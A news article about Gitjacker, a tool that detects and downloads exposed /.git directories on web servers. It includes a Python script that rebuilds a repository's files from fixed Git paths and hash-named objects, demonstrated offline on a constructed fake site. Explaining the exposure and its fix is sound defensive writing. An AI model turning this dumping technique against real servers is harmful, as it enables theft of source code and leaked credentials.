Web developers sometimes deploy a site together with its /.git directory, or forget to remove the directory afterwards, exposing sensitive information to anyone who can reach the web server. A new open-source tool dubbed ‘Gitjacker’ is built to find such exposures.
A .git directory stores all of your Git repository data, such as configuration, commit history, and the actual content of each file in the repository. As a rule of thumb, /.git folders should never be uploaded online.
If someone can access the entire contents of a .git directory of a website, they can retrieve raw source code for that site, and sensitive configuration data like database passwords, password salts, and more.
So, Gitjacker helps developers detect leaked .git directories on websites. It was created by British software engineer Liam Galvin in the Go programming language, and can be downloaded for free from GitHub.
In the simplest terms, Gitjacker lets a user point it at a site and check whether a /.git directory is reachable over HTTP on a production system.
It can also surface /.git directories that were accidentally baked into Docker images by automated build chains and later deployed as web servers.
Gitjacker Isn’t Just Limited To .git Folders
The tool does not only find /.git directories: it also fetches their contents, including sensitive configuration files, with a single command.
Attackers routinely scan the internet for such directories on accidentally exposed systems and download their contents to obtain configuration data or the application’s source code.
Web servers with directory listings enabled are especially vulnerable to this kind of attack, since an attacker can simply walk the /.git tree and download every file. With directory listings disabled, retrieving a complete repository is harder: the object files are named by hash, so the attacker has to learn those names from the files Git keeps at fixed paths (HEAD, refs, index, logs) and request each object individually.
But Gitjacker handles the download and extraction of a Git repository for the user even when directory listings are disabled.
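To show what "retrieving a repository without directory listing" actually involves, the following added example (written for this article, not Gitjacker’s own code) reconstructs a checkout from nothing but the fixed-path files and hash-named objects that any tool of this kind must request. A live run would replace the `fetch` callable with an HTTP GET against the target; here the "web server" is a constructed in-memory dictionary holding a tiny repository with one leaked config file, so the script runs offline. The exposure check on `.git/HEAD` is a common heuristic and is an assumption here, not a description of Gitjacker’s internals.

```python
import hashlib
import zlib


def git_object(obj_type: str, content: bytes):
    """Build a loose Git object: returns (sha1 hex, zlib-compressed bytes)."""
    raw = f"{obj_type} {len(content)}\0".encode() + content
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def build_fake_site():
    """Constructed sample: a minimal repo as it would sit under /.git on a web server."""
    blob_sha, blob = git_object("blob", b"<?php $db_pass = 'hunter2';\n")
    tree_sha, tree = git_object("tree", b"100644 config.php\0" + bytes.fromhex(blob_sha))
    commit_sha, commit = git_object(
        "commit",
        (f"tree {tree_sha}\n"
         "author Dev <dev@example.test> 0 +0000\n"
         "committer Dev <dev@example.test> 0 +0000\n\n"
         "add config\n").encode(),
    )
    site = {
        ".git/HEAD": b"ref: refs/heads/main\n",       # fixed path, tells us the branch
        ".git/refs/heads/main": f"{commit_sha}\n".encode(),  # fixed path, tells us the tip commit
    }
    for sha, data in ((blob_sha, blob), (tree_sha, tree), (commit_sha, commit)):
        site[f".git/objects/{sha[:2]}/{sha[2:]}"] = data  # hash-named, unguessable without the above
    return site


def head_exposed(fetch) -> bool:
    """Heuristic exposure check (assumption): .git/HEAD is a symbolic ref or a raw 40-hex SHA."""
    data = fetch(".git/HEAD")
    if data is None:
        return False
    text = data.decode(errors="replace").strip()
    return text.startswith("ref: ") or (len(text) == 40 and all(c in "0123456789abcdef" for c in text))


def read_object(fetch, sha: str):
    """Download one loose object by hash, verify it, return (type, body)."""
    data = fetch(f".git/objects/{sha[:2]}/{sha[2:]}")
    if data is None:
        raise FileNotFoundError(f"object {sha} not served")
    raw = zlib.decompress(data)
    header, _, body = raw.partition(b"\0")
    obj_type, size = header.decode().split(" ")
    if int(size) != len(body) or hashlib.sha1(raw).hexdigest() != sha:
        raise ValueError(f"corrupt object {sha}")
    return obj_type, body


def parse_tree(body: bytes):
    """Yield (mode, name, sha) entries from a tree object body."""
    i = 0
    while i < len(body):
        nul = body.index(b"\0", i)
        mode, name = body[i:nul].decode().split(" ", 1)
        yield mode, name, body[nul + 1:nul + 21].hex()
        i = nul + 21


def dump_repo(fetch):
    """Reconstruct the files of the HEAD commit without any directory listing."""
    head = fetch(".git/HEAD").decode().strip()
    commit_sha = fetch(f".git/{head[5:]}").decode().strip() if head.startswith("ref: ") else head
    obj_type, body = read_object(fetch, commit_sha)
    if obj_type != "commit":
        raise ValueError("HEAD does not point at a commit")
    tree_sha = body.split(b"\n", 1)[0].split(b" ")[1].decode()
    files = {}

    def walk(sha, prefix):
        for mode, name, entry_sha in parse_tree(read_object(fetch, sha)[1]):
            if mode == "40000":                      # Git writes directories as "40000"
                walk(entry_sha, prefix + name + "/")
            else:
                files[prefix + name] = read_object(fetch, entry_sha)[1]

    walk(tree_sha, "")
    return files


if __name__ == "__main__":
    fetch = build_fake_site().get
    print("exposed:", head_exposed(fetch))
    for path, content in dump_repo(fetch).items():
        print(path, content)
```

Everything the script needs is reached by following pointers from fixed paths: HEAD names a ref, the ref names a commit, the commit names a tree, and the tree names blobs. That is why disabling directory listing only slows an attacker down, and why the only real fix is to keep /.git off the web root (or deny it at the server) rather than to hide it.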
The developer of Gitjacker says that he built the tool for use in penetration tests. Given its capabilities, however, Gitjacker can just as easily be abused by malicious actors, who have a long history of turning open-source security tools to their own purposes.